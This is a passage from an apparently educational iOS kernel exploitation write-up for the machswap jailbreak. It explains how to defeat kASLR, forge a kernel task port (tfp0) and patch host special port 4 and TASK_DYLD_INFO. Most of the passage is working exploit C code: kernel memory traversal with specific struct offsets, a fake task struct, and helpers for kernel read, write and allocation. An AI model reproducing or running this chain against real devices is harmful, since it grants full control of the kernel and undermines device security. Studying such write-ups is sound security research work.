rk32(addr + 0x4, read64_tmp); /* Read the higher 32 bits */\
rk32(addr, value); /* Read the lower 32 bits */\
value = value | ((uint64_t)read64_tmp << 32) /* Shift the higher bits left by 32 and OR against the lower bits */
We now have a working read primitive based on our fakeport and newly-allocated fake task struct.
0x07 Defeating kASLR
ASLR (Address Space Layout Randomization) is a mitigation used to make exploitation of software harder by shifting all the static data within a program’s address space by a constant but randomized value (hence the “random” element). In the kernel, this is used to shift all of the static regions (__TEXT, __DATA.__const, etc) from a static base value to a higher, random memory location. It’s important to derive this value (known as the kernel “slide”) as it is commonly used by jailbreaks in order to read and write data from static offsets, and call functions in kernel __TEXT.
The first thought that may come to mind when learning about kASLR is simply “can it be brute forced”? In the typical sense of simply trying to read from every possible base address until you get some data, the answer is no. This is due to the fact that the kernel slide can vary by a huge amount, and when attempting to read from every address you would likely hit an unmapped region. If the kernel tries to read from an unmapped region a fault is triggered ending in a panic. This would hugely decrease the success rate of the exploit, as you would be relying on a near perfect guess of where the kernel image is located in memory. Here is the code used to derive the kernel base address, courtesy of the iPhoneWiki:
base = 0x01000000 + (slide_byte * 0x00200000)
The slide_byte spans values 0 through 255, however in the case of 0 a base of 0x21000000 is used, so we can model the slide_byte as actually spanning values 1 through 256. This means that the lowest base is 0x01200000, and the highest is 0x21000000. Subtracting these gives 0x1fe00000, which is a whopping 530+MB of data! Taking this into account, it is clear that brute forcing by simply trying every possible address would more than likely hit unmapped memory.
However, there is a trick you can use to guarantee that you won’t hit unmapped memory. Take a look at this output from jtool:
$ jtool -l ~/Desktop/kernels/84-1211 | grep LC_SEGMENT_64
LC 00: LC_SEGMENT_64 Mem: 0xfffffff007004000-0xfffffff007078000 __TEXT
LC 01: LC_SEGMENT_64 Mem: 0xfffffff007078000-0xfffffff007098000 __DATA_CONST
LC 02: LC_SEGMENT_64 Mem: 0xfffffff007098000-0xfffffff0075c8000 __TEXT_EXEC
LC 03: LC_SEGMENT_64 Mem: 0xfffffff0075c8000-0xfffffff0075cc000 __LAST
LC 04: LC_SEGMENT_64 Mem: 0xfffffff0075cc000-0xfffffff0075d0000 __KLD
LC 05: LC_SEGMENT_64 Mem: 0xfffffff0075d0000-0xfffffff007678000 __DATA
LC 06: LC_SEGMENT_64 Mem: 0xfffffff007678000-0xfffffff007690000 __BOOTDATA
LC 07: LC_SEGMENT_64 Mem: 0xfffffff005ca4000-0xfffffff006138000 __PRELINK_TEXT
LC 08: LC_SEGMENT_64 Mem: 0xfffffff0077e8000-0xfffffff0079e0000 __PRELINK_INFO
[...]
Up until the beginning of PRELINK_TEXT, all regions (including __TEXT) are mapped completely continuously (right as one segment ends, another one starts) at the base of the kernel virtual address space (VAS). Therefore, if we are able to find a pointer into __TEXT (ie, the address of a function), we can then derive the base of the kernel via brute force as we are guaranteed not to hit any unmapped memory! The only question is, how do we get such a pointer?
In C++, every object of a class with virtual methods contains a pointer to a vtable. The vtable is an array of “virtual” methods (the virtual functions which the class implements) – simply a list of function pointers – and the pointer to it is located at offset 0x0 within the object. If we can find such a C++ object (and therefore its vtable), we can get our function pointer, and derive the kernel slide.
Since we have a read primitive set up, and an attacker-controlled port, we can traverse kernel memory to find such a C++ object.
One example is the IOSurfaceUserClient object, which we created earlier when we set up our heap spray. We can register the port we opened to the client via the mach_ports_register API, which stores a pointer to the port in a field within our task struct: itk_registered.
kern_return_t
mach_ports_register(
task_t task,
mach_port_array_t memory,
mach_msg_type_number_t portsCnt)
{
[...]
for (i = 0; i < TASK_PORT_REGISTER_MAX; i++) {
ipc_port_t old;
old = task->itk_registered[i];
task->itk_registered[i] = ports[i];
ports[i] = old;
}
[...]
return KERN_SUCCESS;
}
So from our task struct, we can read the itk_registered offset to find the IOSurface ipc_port, then the ip_kobject field to find the C++ object itself, then dereference at offset 0x0 to find the vtable, and then dereference any of the vtable methods to find our __TEXT pointer. However, we first need to find our task struct. For this, we can look at itk_space. This is an address space which holds the Mach port rights owned by a task, mapping the uint32_t port handles to kernel-side ipc_port_t’s. If we can find a message sent to a port owned by our process, we can find the itk_space pointer and therefore traverse kernel memory to find the address of a port we allocate within our task, and from there our own task struct (ipc_space->is_task).
Luckily, our fakeport is owned by our process, we have a userland handle on it to which we can send a message, and we can then read the ip_messages struct within our fakeport to find the kernel representation of the Mach message which was sent. This is similar to a technique which I have used in the past in order to get a buffer of data into kernelspace, except this time it is used for ports instead of data.
static kern_return_t send_port(mach_port_t rcv, mach_port_t myP)
{
typedef struct {
mach_msg_header_t Head;
mach_msg_body_t msgh_body;
mach_msg_port_descriptor_t task_port;
} Request;
[...]
InP->msgh_body.msgh_descriptor_count = 1;
InP->task_port.name = myP;
InP->task_port.disposition = MACH_MSG_TYPE_COPY_SEND;
InP->task_port.type = MACH_MSG_PORT_DESCRIPTOR;
err = mach_msg(&InP->Head, MACH_SEND_MSG | MACH_SEND_TIMEOUT, InP->Head.msgh_size, 0, 0, 5, 0);
[...]
}
Here we set up a message containing a Mach port descriptor, and put our port handle into that descriptor. We then call send_port using our fakeport as the rcv argument, and a newly allocated port with both receive and send rights as our myP argument.
Once the Mach message has been sent, it will be present within fakeport->ip_messages.port.messages. We can then traverse from this message to find the pointer to our task as so:
ret = send_port(the_one, gangport);
uint64_t ikmq_base = fakeport->ip_messages.port.messages;
uint64_t ikm_header = 0x0;
rk64(ikmq_base + 0x18, ikm_header); /* ipc_kmsg->ikm_header */
uint64_t port_addr = 0x0;
rk64(ikm_header + 0x24, port_addr); /* 0x24 is mach_msg_header_t + body + offset of our port into mach_port_descriptor_t */
uint64_t itk_space = 0x0;
rk64(port_addr + offsetof(kport_t, ip_receiver), itk_space);
uint64_t ourtask = 0x0;
rk64(itk_space + 0x28, ourtask); /* ipc_space->is_task */
Since we now have a pointer to our task struct, we can use the mach_ports_register trick to register the IOSurface UserClient, and perform a few more reads to find the vtable entry:
ret = mach_ports_register(mach_task_self(), &client, 1);
uint64_t iosruc_port = 0x0;
rk64(ourtask + offsets->struct_offsets.task_itk_registered, iosruc_port);
uint64_t iosruc_addr = 0x0;
rk64(iosruc_port + offsetof(kport_t, ip_kobject), iosruc_addr);
uint64_t iosruc_vtab = 0x0;
rk64(iosruc_addr + 0x0, iosruc_vtab);
uint64_t get_trap_for_index_addr = 0x0;
rk64(iosruc_vtab + (offsets->iosurface.get_external_trap_for_index * 0x8), get_trap_for_index_addr);
get_trap_for_index_addr is the address of the IOSurfaceRootUserClient::getExternalTrapForIndex function, which resides in the kernel’s __TEXT region. We can then walk backwards until we reach the magic value at the kernel header (MH_MAGIC_64).
#define KERNEL_HEADER_OFFSET 0x4000
#define KERNEL_SLIDE_STEP 0x100000
uint64_t kernel_base = (get_trap_for_index_addr & ~(KERNEL_SLIDE_STEP - 1)) + KERNEL_HEADER_OFFSET;
do
{
uint32_t kbase_value = 0x0;
rk32(kernel_base, kbase_value);
if (kbase_value == MH_MAGIC_64)
{
LOG("found kernel_base: 0x%llx", kernel_base);
break;
}
kernel_base -= KERNEL_SLIDE_STEP;
} while (true);
uint64_t kslide = kernel_base - offsets->constant.kernel_image_base;
As we have deduced the kslide value, kASLR has now been defeated, and we continue with our exploitation by building the final primitive: the fake kernel task port. This task port will allow full read and write access to the kernel’s VM map, allowing arbitrary modification of kernel data.
0x08 Building a Fake Kernel Task Port
A kernel task port is simply an ipc_port struct of type IKOT_TASK, with a representation of the kernel’s task_t struct attached. However, when using the task port in the Mach API, many of the fields aren’t checked or accessed at any point. This means we don’t need to use the original ipc_port or task_t structs; we can simply forge arbitrary ones containing the minimum of data filled out in order for the Mach API to recognise it as a valid port. Luckily, there are only two things we need to find. The first is the kernel’s vm_map_t, which is a struct that holds data about the kernel’s virtual address space.
The kernel implements a nice feature which allows you to easily loop through proc_t structs (and hence their corresponding task_t counterparts) to find target processes, via a linked list (p_list) at the start of the proc_t struct. This includes the kernel’s proc and task structs (kernel_task actually runs as a “normal” process on your system, with the PID 0 – you can see it in Activity Monitor on macOS).
We already have the address of our own task_t from when we needed to find our IOSurfaceRootUserClient port earlier. So we can dereference the bsd_info pointer to get the corresponding proc_t struct, and then loop backward through the list until we reach the first entry, kernel_task.
struct proc {
LIST_ENTRY(proc) p_list; /* List of all processes. */
void * task; /* corresponding task (static)*/
struct proc * p_pptr; /* Pointer to parent process.(LL) */
[...]
uint64_t kernproc = ourproc;
while (kernproc != 0x0)
{
uint32_t found_pid = 0x0;
rk32(kernproc + offsets->struct_offsets.proc_pid, found_pid);
if (found_pid == 0)
{
break;
}
/*
kernproc will always be at the start of the linked list,
so we loop backwards in order to find it
*/
rk64(kernproc + 0x0, kernproc);
}
From there we can read proc_t->task to get to the kernel’s task_t struct, which contains a field which is a pointer to the kernel’s vm_map_t:
struct task {
/* Synchronization/destruction information */
decl_lck_mtx_data(,lock) /* Task's lock */
_Atomic uint32_t ref_count; /* Number of references to me */
boolean_t active; /* Task has not been terminated */
boolean_t halting; /* Task is being halted */
/* Virtual timers */
uint32_t vtimers;
/* Miscellaneous */
vm_map_t map; /* Address space description */
queue_chain_t tasks; /* global list of tasks */
[...]
To build our fake task struct, we can simply use some hardcoded data, and drop in our kernel vm_map pointer:
fake_task->lock.data = 0x0;
fake_task->lock.type = 0x22;
fake_task->ref_count = 100;
fake_task->active = 1;
fake_task->map = kernel_vm_map;
*(uint32_t *)((uint64_t)fake_task + offsets->struct_offsets.task_itk_self) = 1;
We also need to find the kernel’s ipc_space – this is what the ip_receiver field of a port points to, identifying the task which holds the port’s receive right. It is easy to find, as the receiver of our IOSurfaceUserClient port is the kernel (messages sent on that port are received by the kernel).
/*
since our IOSurfaceRoot userclient is owned by kernel, the
ip_receiver field will point to kernel's ipc space
*/
uint64_t ipc_space_kernel = 0x0;
rk64(iosruc_port + offsetof(kport_t, ip_receiver), ipc_space_kernel);
LOG("ipc_space_kernel: 0x%llx", ipc_space_kernel);
We then temporarily turn our fakeport (the_one) into a kernel task port by updating its ip_receiver, which we can then use as an early tfp0 primitive in order to allocate and write some memory for our kernel task and kernel port structs (error checking omitted):
/* the_one should now have access to kernel mem */
uint64_t kbase_data = kread64(the_one, kernel_base);
LOG("got kernel base: %llx", kbase_data);
/* allocate kernel task */
uint64_t kernel_task_buf = kalloc(the_one, 0x600);
LOG("kernel_task_buf: 0x%llx", kernel_task_buf);
kwrite(the_one, kernel_task_buf, (void *)fake_task, 0x600);
/* allocate kernel port */
uint64_t kernel_port_buf = kalloc(the_one, 0x300);
LOG("kernel_port_buf: 0x%llx", kernel_port_buf);
fakeport->ip_kobject = kernel_task_buf;
kwrite(the_one, kernel_port_buf, (void *)fakeport, 0x300);
Our fakeport the_one is now a “full” (but forged) kernel task port (tfp0) which can be used to read, write, and allocate kernel memory, and is backed completely by kernel buffers – no userland allocations are used after this point.
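The kread64, kwrite, kwrite64, and kalloc helpers used by these snippets aren’t shown; given any working task port (even a forged one), they can be thin wrappers around the mach_vm_* APIs, roughly as follows (names and signatures assumed to match the calls above):
#include <mach/mach.h>
#include <mach/mach_vm.h>
static uint64_t kread64(mach_port_t tfp0, uint64_t addr)
{
    uint64_t value = 0;
    mach_vm_size_t outsize = 0;
    mach_vm_read_overwrite(tfp0, addr, sizeof(value),
                           (mach_vm_address_t)&value, &outsize);
    return value;
}
static void kwrite(mach_port_t tfp0, uint64_t addr, void *data, size_t len)
{
    mach_vm_write(tfp0, addr, (vm_offset_t)data, (mach_msg_type_number_t)len);
}
static void kwrite64(mach_port_t tfp0, uint64_t addr, uint64_t value)
{
    kwrite(tfp0, addr, &value, sizeof(value));
}
static uint64_t kalloc(mach_port_t tfp0, uint64_t size)
{
    mach_vm_address_t addr = 0;
    mach_vm_allocate(tfp0, &addr, size, VM_FLAGS_ANYWHERE);
    return addr;
}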
0x09 Buttoning Up: HSP4, TASK_DYLD_INFO patch
There are a couple more finishing touches we need to apply before we can exit our exploit. The first is setting up the hsp4 (host_get_special_port(..., 4, ...)) patch, which allows processes running as root to get a send right to the kernel task port (tfp0).
This is fairly easy to set up; we simply need to perform a write to the realhost struct, into the ipc_port_t special array.
struct host {
decl_lck_mtx_data(,lock) /* lock to protect exceptions */
ipc_port_t special[HOST_MAX_SPECIAL_PORT + 1];
struct exception_action exc_actions[EXC_TYPES_COUNT];
};
/*
host_get_special_port(4) patch
allows the kernel task port to be accessed by any root process
*/
kwrite64(the_one, realhost + 0x10 + (sizeof(uint64_t) * 4), kernel_port_buf);
We can then quickly elevate our UID to 0 (root) in order to check the patch worked, as the host_get_special_port API requires root access.
Note: we also de-elevate back to the mobile user before exiting the exploit, as leaving ourselves as root can cause instability in the system upon exiting the app. Jailbreaks can quickly and easily re-elevate to root if and when required.
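With the patch applied, a root process can later retrieve tfp0 roughly like this (a sketch of the consumer side):
mach_port_t tfp0 = MACH_PORT_NULL;
kern_return_t ret = host_get_special_port(mach_host_self(), HOST_LOCAL_NODE, 4, &tfp0);
if (ret != KERN_SUCCESS || !MACH_PORT_VALID(tfp0))
{
    /* not running as root, or the hsp4 patch isn't in place */
}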
Another (new) patch is the TASK_DYLD_INFO patch, suggested by @Siguza here. The task_info API allows an application to retrieve information about a specific process, including info about the dynamic linker. As we can see in the following snippet, the kernel will return three fields of data stored in the task struct back to userland.
case TASK_DYLD_INFO:
{
task_dyld_info_t info;
[...]
info = (task_dyld_info_t)task_info_out;
info->all_image_info_addr = task->all_image_info_addr;
info->all_image_info_size = task->all_image_info_size;
/* only set format on output for those expecting it */
if (*task_info_count >= TASK_DYLD_INFO_COUNT) {
info->all_image_info_format = task_has_64Bit_addr(task) ?
TASK_DYLD_ALL_IMAGE_INFO_64 :
TASK_DYLD_ALL_IMAGE_INFO_32 ;
*task_info_count = TASK_DYLD_INFO_COUNT;
} else {
*task_info_count = TASK_LEGACY_DYLD_INFO_COUNT;
}
break;
}
Since the kernel doesn’t use DYLD, nor will our fake task port ever be used by the kernel itself, we can use these fields to store data about the kernel. In this case, we can use the all_image_info_addr field to store the slid base address of the kernel, and the all_image_info_size field to store the kernel slide. This helps alleviate the use of offset-storing files and provides a clean method to find the (previously somewhat tricky to deduce) kernel slide.
/*
task_info TASK_DYLD_INFO patch
this patch (credit @Siguza) allows you to provide tfp0 to the task_info
API, and retrieve some data from the kernel's task struct
we use it for storing the kernel base and kernel slide values
*/
*(uint64_t *)((uint64_t)fake_task + offsets->struct_offsets.task_all_image_info_addr) = kernel_base;
*(uint64_t *)((uint64_t)fake_task + offsets->struct_offsets.task_all_image_info_size) = kslide;
You can then call task_info, providing tfp0 as your port and supplying the TASK_DYLD_INFO flag.
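For example, recovering the kernel base and slide via tfp0 (a send right to the forged kernel task port) might look like this:
struct task_dyld_info dyld_info = {0};
mach_msg_type_number_t count = TASK_DYLD_INFO_COUNT;
kern_return_t ret = task_info(tfp0, TASK_DYLD_INFO, (task_info_t)&dyld_info, &count);
if (ret == KERN_SUCCESS)
{
    uint64_t kernel_base  = dyld_info.all_image_info_addr;
    uint64_t kernel_slide = dyld_info.all_image_info_size;
    LOG("kernel base: 0x%llx, slide: 0x%llx", kernel_base, kernel_slide);
}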
0x0A: Closing Words
For a long time I was completely daunted by the idea of exploiting something as complex as the iOS kernel. However, once I dived in and gave it a go it quickly started to make more and more sense. There is a lot of great reading material online to refer to, including writeups and other open-source exploits. I’m now a big fan of MIG reference counting bugs due to their exploitational simplicity and consistency, and would love to find one as a 0day one day. ;)
Of course thanks to @s1guza, @littlelailo, and @stek29 for development help, and @s0rrymybad for the initial bug details and PoC code. You can find their Twitter handles below.
If you have any questions feel free to @ me and/or follow me on Twitter, and take a look through my GitHub if you’re interested in other open-source iOS projects. Thanks!
Twitter: https://twitter.com/iBSparkes
GitHub: https://github.com/PsychoTea
machswap Source Code: https://github.com/PsychoTea/machswap
machswap2 (SMAP Version): https://github.com/PsychoTea/machswap2
@s1guza: https://twitter.com/s1guza
@littlelailo: https://twitter.com/littlelailo
@stek29: https://twitter.com/stek29
@s0rrymybad: https://twitter.com/s0rrymybad